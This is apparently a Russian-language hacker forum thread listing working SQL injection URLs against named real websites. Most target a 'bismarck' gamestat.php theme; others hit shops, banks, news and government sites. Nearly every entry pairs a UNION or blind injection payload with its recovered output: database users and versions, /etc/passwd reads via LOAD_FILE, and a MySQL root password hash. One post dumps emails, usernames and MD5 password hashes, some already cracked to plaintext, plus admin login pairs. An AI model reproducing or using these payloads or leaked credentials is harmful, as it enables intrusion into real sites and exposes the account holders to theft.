SQL Инъекции

Все инъекции чекнутые моим Антибояном, после чего добавлены в его же базу.

Code:

http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=121269546138015100+union+select+concat_ws(0x3a,user(),database(),version()),2/*&config=cfg-default.php

user() : database() : version()
root@localhost:vsp:4.1.22-log

Code:

http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user+/*&config=cfg-default.php

[/code]
file_priv = Y

Code:

http://q3.bpnet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2+/*&config=cfg-default.php

/etc/passwd

Code:

http://q3.tupoleva.net/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
vsp@localhost : vsp : 4.1.22

Code:

http://195.222.33.230/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
cod2_stats@localhost : vsp : 4.1.20-community-nt

Code:

http://partymanproductions.com/WolfStats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
joatmon@localhost : joatmon_wolfstat : 5.0.37-standard

Code:

http://quake3.perm.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
quake3@localhost : quake3 : 5.0.32-Debian_7etch8-log

Code:

http://nlcgaming.aj-services.com/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
apcyberax@localhost : nlcgaming : 5.0.45

file_priv=Y

Code:

http://nlcgaming.aj-services.com/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd

Code:

http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
root@localhost : vsp : 5.0.27

Code:

http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user&config=cfg-default.php

file_priv=Y

Code:

http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),file_priv+from+mysql.user&config=cfg-default.php

/etc/passwd

Code:

http://railwhore.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
[email protected] : brianyo_vmstats : 4.0.2

Code:

http://www.slquake.com/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
[email protected]:db260613578:4.0.27-max-

Code:

http://krautz.clanserver4u.de/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
[email protected]:ws_59449_1:5.0.51a-24-log

Code:

http://www.dailycod.com/vsp/cod2/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
vsp@localhost : vsp : 5.0.67-log

Code:

http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
root@localhost : ccvsp : 5.0.27

Code:

http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user&config=cfg-default.php

file_priv=Y

Code:

http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd

Code:

http://www.enolan.info/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

user() : database() : version()
[email protected]:q3db_3w:5.0.67-log

 

ГАВ

Version: 5.0.24
Username: citybusiness@localhost
Dbname: citybusiness

 

http://www.maket.eu/products.php?product_id=-56+union+select+1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12&id=3&start=5


Database Version: 5.0.67-community
Database name: maketeu_maket
User name: maketeu_site@localhost

 

Все инъекции чекнутые моим Антибояном, после чего добавлены в его же базу.

Code:

http://fpsgamer.jp/vsp/tourney2/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

bsan@localhost:vsp:5.0.32-Debian_7etch6-log

Code:

http://fpsgamer.jp/vsp/tourney2/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd
file_priv=Y

Code:

http://www.fragginrockets.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

oopsie_vsp@localhostopsie_vsp:5.0.45

Code:

http://stats.etbunker.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

etbunker_forums@localhost:etbunker_vspstats:4.1.22-standard

Code:

http://cod.wck.biz/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

root@localhost:codstats2:5.0.32-Debian_7etch8-log

Code:

http://cod.wck.biz/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd
file_priv=Y

Code:

http://www.teamnachtjager.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

quake3@localhost:vsp_bq3:5.0.45

Code:

http://biohazard.moyse.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

root@localhost:biohazard_stats:5.0.32-Debian_7etch8-log

Code:

http://biohazard.moyse.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd
file_priv=Y

Code:

http://q3stats.siberianet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

[email protected]:q3:5.0.77-log

Code:

http://www.4fclan.com/VSP/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

nruclan_svstats@localhost:nruclan_4Fstats:4.1.22-standard-log

Code:

http://www.awe-clan.com/vsp3/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

aweclanc_neilemm@localhost:aweclanc_stats3:5.0.75-community-log

Code:

http://dmpstats.rko.nu/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

[email protected]:dmpstats:5.0.67

Code:

http://stats.s4ndmod.com/aoastats/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

[email protected]:headshotsniping:4.0

 

Code:

http://www.itoamerica.com/index.php?section=pdf&id=325+union+select+version(),2,3,4+limit+1,1/*

version():4.1.20
database():itoamerica
user():root@localhost

 

http://www.priderentals-bg.com/priderentals/property_info.php?idproperty=-55+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3a,version(),database(),user())



Database Version: 5.0.67-community
Database name: pridebg_pride
User name: pridebg_pridebg@localhost

 

Все инъекции чекнутые моим (и вашем тоже) Антибояном, после чего добавлены в его же базу.

Code:

http://xinul.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log

Code:

http://montekidlo.org.ua/stat/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

root@localhost:vsp:5.0.51a

Code:

http://montekidlo.org.ua/stat/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd
file_priv=Y

Code:

http://www.etozclan.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

etozclan_stats@localhost:etozclan_vspstats:4.1.22-standard

Code:

http://games.zir.net/vsp/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

ethost1@localhost:ethost1_vsp

Code:

http://www.fsk-clan.de/stats1/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

chris@localhost:vsp1:5.0.24a-Debian_9ubuntu2-log

Code:

http://www.fsk-clan.de/stats1/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd
file_priv=Y

Code:

http://www.3val.ru/games/cod2/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

root@localhost:cod2stats:5.0.51b-community-nt-log
file_priv=N

 

Code:

http://www.apsira.com/loans/bank.php?bankId=10+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14+limit+1,1

version():5.0.75-community-log
database():jadianor_ap
user():jadianor_apsira@localhost
__

Code:

http://www.guardian-bank.com/webinfo.php?main=11+union+select+1,2/*

version():5.0.45
database():guardiankdb
user():guardianb#@localhost

Code:

http://www.guardian-bank.com/webinfo.php?main=11+union+select+1,2+from+users/*

__

Code:

http://www.arch-no.org/News.php?mode=read&id=271+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7+limit+1,1/*

version():5.0.22-Debian_0ubuntu6.06.11-log
database():archno
user():archno@localhost
__

Code:

http://www.icallsofts.com/productdetails.php?id=12+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8/*

version():4.1.22-standard-log
database():ishgod_softwares
user():[email protected]
__

Code:

http://www.ideas-bank.ru/trening.php?id=61+union+select+1,2,3,4,5,6,7,8,9,10,11+limit+1,1/*

__

Code:

http://www.7days.ae/storydetails.php?id=75189%27+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+limit+1,1/*

version(): 5.0.45
database():sevendaysdb
user():sevendaysdb@localhost

 

Blind SQL, ebscohost.com PR=9
!

http://www.ebscohost.com/customerSuccess/default.php?id=253+and+substring(@@version,1,1)=4 ===> False

http://www.ebscohost.com/customerSuccess/default.php?id=253+and+substring(@@version,1,1)=5 ===> True

не баян

 

Database Version: 5.0.21
Database name: ctl_events
User name: [email protected]


www.loria.fr PR - 7

Database Version: 4.0.14
Database name: WebStress
User name: [email protected]


Читаем etc/passwd

Читаем /etc/issue

Mandrakelinux release 10.2 (Limited Edition 2005) for i586
Kernel 2.6.11-6mdk on an i686

 

TELO, посмотри-ка сюда http://www.google.com/search?client=opera&rls=en&q=hardvision.ru+site:forum.antichat.ru&sourceid=opera&ie=utf-8&oe=utf-8. Видишь сколько раз уже выкладывали скули на этот сайт? И если минуса не хочешь получить, будь добр, чекай все на Антибояне Не зря же я его создавал.

Code:

http://valksfun.nl/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

valksfun@localhost:valksfun_main:4.1.21-standard

Code:

http://proxy.doomwarriors.de/27961/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

vsp@localhost:vsp:5.0.27

Code:

http://ext.kubnet.lnetw.ru/q3a/stats/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

vsp@localhost:vsp:5.0.51a-log

Code:

http://www.dev1ance.net/desire/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

root@localhost:vspfreeze:4.0.24-standard

Code:

http://www.dev1ance.net/desire/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd
file_priv=Y

Code:

http://cs.uch.net/q3stat/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

cs16@localhost:q3:5.1.30

Code:

http://urt.voxel.net/stats/ffa/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

ffa@localhost:ffa:5.0.45

Code:

http://urt.voxel.net/stats/ffa/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764),2&config=cfg-default.php

/etc/passwd
file_priv=Y

Code:

http://quake.academ.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

[email protected]:q3_stats_vsp:5.0.32-Debian_7etch5-log

Code:

http://miguel-lopez.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

[email protected]:mmarti1_vsp:4.0.26

Code:

http://vsp.goodguysclan.net/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

goodguys@localhost:goodguys:5.0.32-Debian_7etch6

Code:

http://tacticalinstinct.com/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),version()),2&config=cfg-default.php

TacticalInstinct@localhost:TacticalInstinctScore:5.0.22-Debian_0ubuntu6.06.6-log

 

http://www.brainyminds.com/client.php?id=-3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**//*

Database Version: 4.1.20
Database name: ssmith_bm
User name: ssmith_brainy@localhost

http://www.nlpplanning.com/client.php?id=-8/**/UNION/**/SELECT/**/1,2/**/l/*

Database Version: 4.0.30-log
Database name: u10001284
User name: [email protected]

 

http://www.hosse.bg/bg/materials_details.php?id_d=228+AND+ASCII(SUBSTRING((select+y=1..3()),1,1))=x=1..3-- &vid=0

y1=version
y2=database
y3=user


x1=53,46,48,46,54,55,45,99,111,109,109,117,110,105,116,121
x2=104,111,115,115,101,98,103,95,72,111,115,115,101
x3=104,111,115,115,101,98,103,95,115,105,116,101,64,108,111,99,97,108,104,111,115,116

Version : 5.0.67-community
Database : hossebg_Hosse
User : hossebg_site@localhost

http://lighthouse-bg.com/en/news_details.php?id=12+AND+ASCII(SUBSTRING((select+y=1..3() ),1,1))=x=1..3


x1=52,46,49,46,50,50,45,108,111,103
x2=76,105,103,104,116,72,111,117,115,101
x3=108,105,103,104,116,104,111,117,115,101,95,115,105,116,101,64,108,111,99,97,108,104,111,115,116


Version : 4.1.22-log
Database : LightHouse
User : lighthouse_site@localhost

 

Database Version: 5.0.27
Database name: img
User name: img_www@localhost

email : username : password

:[email protected]:gqwang:e626af9acac0165ac2c255c50ab69635
:[email protected]:t99_wln:d56866603fab6a244ffede4665c1bd81
:[email protected]:mfragg:25d55ad283aa400af464c76d713c07ad хэш MD5:25d55ad283aa400af464c76d713c07ad:12345678
:[email protected]:nlynsue:3b29022319c8cc1cfdf6bf02bb9e3b7b
:[email protected]:rtaylor:a1fbaf89ee953ac23463e3f5004eeeb3
[email protected]apila:1d251a2cfe2e5ab8c3d3ae444a4120c7
:[email protected]:Alex:d17e766901035c27e26912839ff6d5c2 хэш MD5:d17e766901035c27e26912839ff6d5c2:lissi
:[email protected]:akopa:63eee61b891edc21435bc7937c11eaa6 хэш MD5:63eee61b891edc21435bc7937c11eaa6:stratocaster
:[email protected]:mhuang:1a7da1aab8b86aa59090f0e803254a4b хэш MD5:1a7da1aab8b86aa59090f0e803254a4b:yhuang12
:[email protected]:khwu:104aa947ad49c59f7f3961bd533891d6 хэш MD5:104aa947ad49c59f7f3961bd533891d6:topgun11
:[email protected]:maojiao:a8631c4151a95ad515e8aeabf6f7471e



admin : d41d8cd98f00b204e9800998ecf8427e



PR - 4

Version: 4.0.21
User: [email protected]
Database: cowboy54



PageRank = 5

Version: 4.0.27-log
User: slough@localhost
Database: slough

 

http://www.collectionauto.ru/index.php?menu=-7+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9--


Database Version: 5.0.67-community
Database name: sonnec_auto
User name: sonnec_sunex@localhost

 

http://www.dropball.ru/news.php?type=1&id=1371%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(concat(U_Username,0x3a,U_Password))),14,15,16,17,18,19,20,21%20from%20w3t_Users%20limit%2089,1+--+

Вывод в title страницы...

 

http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7'+union+select+1,2,version(),4,5,6,load_file('/etc/passwd'),8,9,10/*

Version: 4.0.26
Database: inacif_gob_gt
User: inacif@localhost

http://www.baltimoretechnologypark.com/index.php?showPage=152&nwid=-58'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11/*

Version: 4.0.26
Database: baltimoretechnologypark_com
User: btpark@localhost

 

Инет магазин

Code:

http://avb.com.ua/show_tovar.php?id=-352334 union select 1,2,3,login,5,password,7,8,9,10,11 FROM raznoe -- 

админ :: пасс
administrator :: price

 

Code:

http://new-list.com/recommend.php?id=9822+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13+limit+1,1/*

version():5.0.22-log
database():newlist_articles
user():newlist@localhost
__

Code:

http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(version(),0x3a,database(),0x3a,user()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+1,1/*

version():5.0.32-Debian_7etch8-log
database():accesat
user():root@localhost

Code:

http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,concat(user,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+1,1/*

root:*5D56577929EBE57FA00A78DCEC07B00F70FE86C9

Code:

http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,load_f ile(%27/etc/passwd%27),12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27+limit+1,1/*

__

Code:

http://www.bcd-fed.be/events.php?action=info&id=36%27+union+select+1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6+limit+1,1/*

version():5.0.18-nt
database():bcd-fed
user():bcd-fed003@localhost
__

Code:

http://www.dereserven.be/index.php?menu=Ploeg&pag=Info&id=55+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

version():4.1.22-standard-log
database():wsouden_start
user():wsouden_wsouden@localhost

 

завтрак

User: commserv@localhost
Version: 4.0.14-max
Dbname: commserv

news

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Dbname: byudbs
Username: [email protected]
Version: 5.0.26-log